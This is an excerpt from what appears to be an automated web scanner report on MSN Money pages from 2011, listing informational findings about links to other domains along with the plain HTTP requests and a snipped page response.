http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://us.social.s-msn.com/s/images/bluemannxl.png
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3
http://www.bing.com/search?q=bank+of+america&form=MSMONY
http://www.bing.com/search?q=citi&form=MSMONY
http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3
http://www.bing.com/search?q=perfect+credit+score&form=money3
http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY
http://www.bing.com/search?q=wells+fargo&form=MSMONY
http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3
http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.creditcards.com/?aid=46bf5df1
http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1
http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1
http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1
http://www.delish.com/
http://www.facebook.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.twitter.com/
http://www.visible-banking.com/
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353382&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM08
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sun, 30 Jan 2011 02:09:41 GMT
Content-Length: 91286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com/msn/default.aspx">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/">Sports</a></li><li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV">Travel</a>
...[SNIP]...
<li class="hotmail"><a href="http://mail.live.com/" class="inbox">Hotmail</a></li><li><a class="msgr" href="http://explore.live.com/windows-live-messenger">Messenger</a></li><li class="last"><a href="http://www.bing.com/search/?FORM=MSMONY&mkt=en-US">Bing</a></li></ul><div class="myhp"><a href="http://www.myhomeredacted">Make MSN your homepage</a>
...[SNIP]...
<li class="last"><a href="http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx">Help</a>
...[SNIP]...
<li class="pipe signin"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353382&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fcredit-cards%2FTwitter-credit-card-problem-solver-credit-cards.aspx%3FGT1%3D33001&lc=1033&id=250710" class="dMSNME_1">Sign in</a>
...[SNIP]...
</span><a href="http://www.bing.com/search" class="last">Web</a>
...[SNIP]...
<li><a href="https://secure.bundle.com/msn">MY MONEY</a>
...[SNIP]...
<cite>By <a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew">CreditCards.com</a>
...[SNIP]...
<p class="partnerlogo cf"><a href="http://www.creditcards.com/?aid=46bf5df1" class="opennew"><img src="http://colstb.msn.com/i/7E/1944B57464FBD948FCCE16DB38BB4.jpg" width="120" height="30" alt="CreditCards.com on MSN Money" />
...[SNIP]...
<p>Why wait on endless hold to dispute a credit card fee over the phone when you can post your complaint on <a class="opennew" href="http://www.twitter.com/">Twitter</a>
...[SNIP]...
<p>Most major banks in the United States, including <a class="opennew" href="http://www.bing.com/search?q=wells+fargo&form=MSMONY">Wells Fargo</a>, <a class="opennew" href="http://www.bing.com/search?q=bank+of+america&form=MSMONY">Bank of America</a> and <a class="opennew" href="http://www.bing.com/search?q=citi&form=MSMONY">Citi</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY" class="opennew"><img src="http://moneycentral.redacted/content/data/images/Thumbnail/bingLogo-60.gif" width="60" height="27" alt="Search for personal finance on Twitter on Bing" class="img1" />
...[SNIP]...
<p><a href="http://www.bing.com/search?q=personal+finance+twitter&form=MSMONY" class="opennew">Personal finance on Twitter</a>
...[SNIP]...
messages can be helpful. "Customer service is one of the most logical and valuable uses of Twitter," says Christophe Langlois, who tracks the social media use of financial institutions on the website <a class="opennew" href="http://www.Visible-Banking.com/">Visible-Banking</a>
...[SNIP]...
<p>Like most major financial institutions, MasterCard has channels on Twitter and <a class="opennew" href="http://www.facebook.com/">Facebook</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/dispute-credit-card-product-merchant-1282.php?aid=46bf5df1" class="opennew">How to dispute a credit card bill with a merchant</a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/change-financial-bad-habits-8-steps-1281.php?aid=46bf5df1" class="opennew">How to change financial bad habits in 8 steps </a>
...[SNIP]...
<li><a href="http://www.creditcards.com/credit-card-news/foreign-exchange-fees-going-up-1267.php?aid=46bf5df1" class="opennew">Credit card foreign transaction fees going up </a>
...[SNIP]...
rue','1');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001&rrurt=1&rrcontrolId=ratCntrlBinary" title="You recommend this" rel="nofollow"><img id="ratCntrlBinaryYesButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/up_normal.gif" title="You recommend this" alt="You recommend this" /><span id="rrBCYesPer" class="rrbpercent">
...[SNIP]...
0');" href="http://money.msn.com/credit-cards/Twitter-credit-card-problem-solver-credit-cards.aspx?GT1=33001&rrurt=0&rrcontrolId=ratCntrlBinary" title="You don't recommend this" rel="nofollow"><img id="ratCntrlBinaryNoButton" class="rrimg" src="http://blu.stc.s-msn.com/br/scp/css/15/decoration/toolbar/rating/down_normal.gif" title="You don't recommend this" alt="You don't recommend this" /><span id="rrBCNoPer" class="rrbpercent">
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCVWVNin8ahOnxbu6CkILsHwH9Nb0iHEA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4Qa8-uoUmEQdtynN8UHyDsm0Gf4yux_w?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XhHKEEqDclSE9c3w1kYC384bKtOH8c9QD?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xy9lyrB9uNmQYnrDXykw1bou-4mmDzNFp?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XPfeT1kpYS7Wn-RcQ1SZR5hEkyQXJ2qN6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X4IURpi95kG_DlLZcfdgJaIP5Cdx2N033?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XHbIFZX69e-qNzxvkIyimvEbvjpCVpW6S?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGoG-LEpQfUy6k-KMKBYowSsHdlMkNkJh?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTTBewGalOM4CqQLRfE7MRRgpeJSYNQ8u?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X7V_Rv-PpYCuEZxovOFi02qEgNUb2tziQ?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XRKEouVn3wnqlwUUAegcxQYTdNJy-p03z?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucrptlnk" href="http://help.live.com/help.aspx?mkt=en-gb&project=tou&querytype=keyword&query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>Fundamental company data and historical chart data provided by <a href="http://www.reuters.com/">Thomson Reuters</a> (<a href="http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm">click for restrictions</a>). Real-time quotes provided by <a href="http://www.batstrading.com/">BATS Exchange</a>. Real-time index quotes and delayed quotes supplied by <a href="http://www.interactivedata-rts.com/">Interactive Data Real-Time Services</a>. Fund summary, fund performance and dividend data provided by <a href="http://www.morningstar.com/">Morningstar Inc</a>. Analyst recommendations provided by <a href="http://www.zacks.com/">Zacks Investment Research</a>. IPO data provided by <a href="http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml">Hoover's Inc</a>. Index membership data provided by <a href="http://www.six-telekurs.com/tkfich_index/tkfich_home.htm">SIX Telekurs</a>
...[SNIP]...
<p>Japanese stock price data provided by <a href="http://www.nri.co.jp/english/">Nomura Research Institute Ltd</a>.; quotes delayed 20 minutes. Canadian fund data provided by <a href="http://www.cannex.com/">CANNEX Financial Exchanges Ltd</a>
...[SNIP]...
</a><a href="http://ccc01.opinionlab.com/o.asp?id=swHtlTXj">Feedback</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3">What is the best way to establish credit?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3">What is a FICO credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=perfect+credit+score&form=money3">What is a perfect credit score?</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3">How do I get a free credit report?</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3">How do I dispute items on my credit report?</a>
...[SNIP]...
<li class="ter"><a href="http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3">5 secrets to climbing the ladder faster</a>
...[SNIP]...
<li class="ter"><a href="http://www.slate.com/id/2282620?ocid=xnetr2-4">Is Facebook making us miserable?</a>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">Privacy</a>
...[SNIP]...
<li class="first"><a class="openpopup" rel="width=800,height=600,resizeable=yes,status=no,titlebar=no,toolbar=no,scrollbars=yes" href="http://onlinehelp.microsoft.com/en-us/msn/money.aspx">Help</a></li><li><a href="http://advertising.microsoft.com/msn/">About our ads</a>
...[SNIP]...
<li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false">Feedback</a>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

22.188. http://money.redacted/how-to-invest/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/how-to-invest/default-dyn.aspx?cp-documentid=6782985

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://clk.redcated/BEL/go/115817003/direct/01/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410362&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fhow-to-invest%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782985&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /how-to-invest/default-dyn.aspx?cp-documentid=6782985 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.189. http://money.redacted/how-to-invest/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/how-to-invest/default-dyn.aspx?cp-documentid=6782985

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://clk.redcated/BEL/go/115817003/direct/01/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353516&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fhow-to-invest%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782985&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

22.190. http://money.redacted/how-to-invest/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/how-to-invest/video.aspx?vid=cc4809b5-8cb5-40ba-9237-cd1098c130ea&from=en-us_money

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://clk.redcated/BEL/go/115817003/direct/01/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353521&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fhow-to-invest%2Fvideo.aspx%3Fvid%3Dcc4809b5-8cb5-40ba-9237-cd1098c130ea%26from%3Den-us_money&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /how-to-invest/video.aspx?vid=cc4809b5-8cb5-40ba-9237-cd1098c130ea&from=en-us_money HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.191. http://money.redacted/how-to-invest/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/how-to-invest/video.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/how-to-invest/video.aspx?vid=cc4809b5-8cb5-40ba-9237-cd1098c130ea&from=en-us_money

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://clk.redcated/BEL/go/115817003/direct/01/
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2482-Salaries-Promotions-5-Secrets-to-climbing-the-ladder-faster/?SiteId=cbmsnhp42482&sc_extcmp=JS_2482_home1&ocid=xnetr2-3
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=cars+with+highest+resale+value&form=MONEY3
http://www.bing.com/search?q=how+to+convert+a+traditional+ira+to+a+roth&form=MONEY3
http://www.bing.com/search?q=how+to+file+income+taxes+electronically&form=MONEY3
http://www.bing.com/search?q=smart+phones+ID+theft&form=MONEY3
http://www.bing.com/search?q=surprising+things+home+insurance+doesn%27t+cover+-medicare&form=MONEY3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.slate.com/id/2282620?ocid=xnetr2-4
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296410372&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fhow-to-invest%2Fvideo.aspx%3Fvid%3Dcc4809b5-8cb5-40ba-9237-cd1098c130ea%26from%3Den-us_money&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

Response

22.192. http://money.redacted/identity-theft/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/identity-theft/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/identity-theft/default-dyn.aspx?cp-documentid=6782998&GT1=33001

The response contains the following links to other domains:

http://about.reuters.com/media/customer_support/branding/popups/full_legal_notice.htm
http://advertising.microsoft.com/msn/
http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://ccc01.opinionlab.com/o.asp?id=swHtlTXj
http://datalossdb.org/
http://datalossdb.org/incidents/3330-1000-patient-names-addresses-health-and-dental-insurance-member-numbers-social-security-numbers-dates-of-birth-dental-care-records-and-dental-x-rays-may-have-been-accessed-by-hacker
http://datalossdb.org/incidents/3337-laptop-with-10-684-unencrypted-names-social-security-numbers-address-and-salary-for-every-employee-receiving-a-w-2-stolen-from-employee-s-car
http://datalossdb.org/incidents/3338-1000-names-and-social-security-numbers-of-employees-stolen-from-employee-s-car
http://datalossdb.org/incidents/3339-documents-containing-sensitive-personal-details-accidentally-disposed-of-at-a-local-recycling-bank-by-the-scottish-court-service
http://datalossdb.org/incidents/3340-1-800-patient-names-dates-of-service-and-certain-clinical-information-exposed-due-to-email-breach
http://explore.live.com/windows-live-messenger
http://go.microsoft.com/fwlink/?LinkId=74170
http://img.widgets.video.s-redacted/js/ch/channels.css
http://img.widgets.video.s-redacted/js/embed.js
http://mail.live.com/
http://msn.careerbuilder.com/Article/MSN-2264-Job-Search-Why-Do-Employers-Care-About-Your-Credit/
http://msn.careerbuilder.com/msn/default.aspx
http://msn.foxsports.com/
http://msn.whitepages.com/
http://onlinehelp.microsoft.com/en-us/msn/money.aspx
http://onlinehelp.microsoft.com/en-us/msn/thebasics.aspx
http://www.batstrading.com/
http://www.bing.com/search
http://www.bing.com/search/?FORM=MSMONY&mkt=en-US
http://www.bing.com/search?q=How+do+I+get+a+free+annual+credit+report&go=&form=money3
http://www.bing.com/search?q=does+credit+counseling+work&form=money3
http://www.bing.com/search?q=how+do+i+dispute+items+on+my+credit+report&form=money3
http://www.bing.com/search?q=perfect+credit+score&form=money3
http://www.bing.com/search?q=what+is+a+fico+credit+score&form=money3
http://www.bing.com/search?q=what+is+the+best+way+to+establish+credit&form=money3
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.cannex.com/
http://www.delish.com/
http://www.hoovers.com/business-information/--pageid__13823--/global-mktg-index.xhtml
http://www.interactivedata-rts.com/
http://www.morningstar.com/
http://www.myhomeredacted/
http://www.nri.co.jp/english/
http://www.reuters.com/
http://www.six-telekurs.com/tkfich_index/tkfich_home.htm
http://www.zacks.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296353384&rver=6.1.6195.0&wp=MBI&wreply=http:%2F%2Fmoney.redacted%2Fidentity-theft%2Fdefault-dyn.aspx%3Fcp-documentid%3D6782998%26GT1%3D33001&lc=1033&id=250710
https://secure.bundle.com/msn
https://secure.opinionlab.com/ccc01/o.asp?ID=AmrwytcP&resize=false

Request

GET /identity-theft/default-dyn.aspx?cp-documentid=6782998&GT1=33001 HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

22.193. http://money.redacted/identity-theft/default-dyn.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/identity-theft/default-dyn.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://money.redacted/identity-theft/default-dyn.aspx?cp-documentid=6782998&GT1=33001

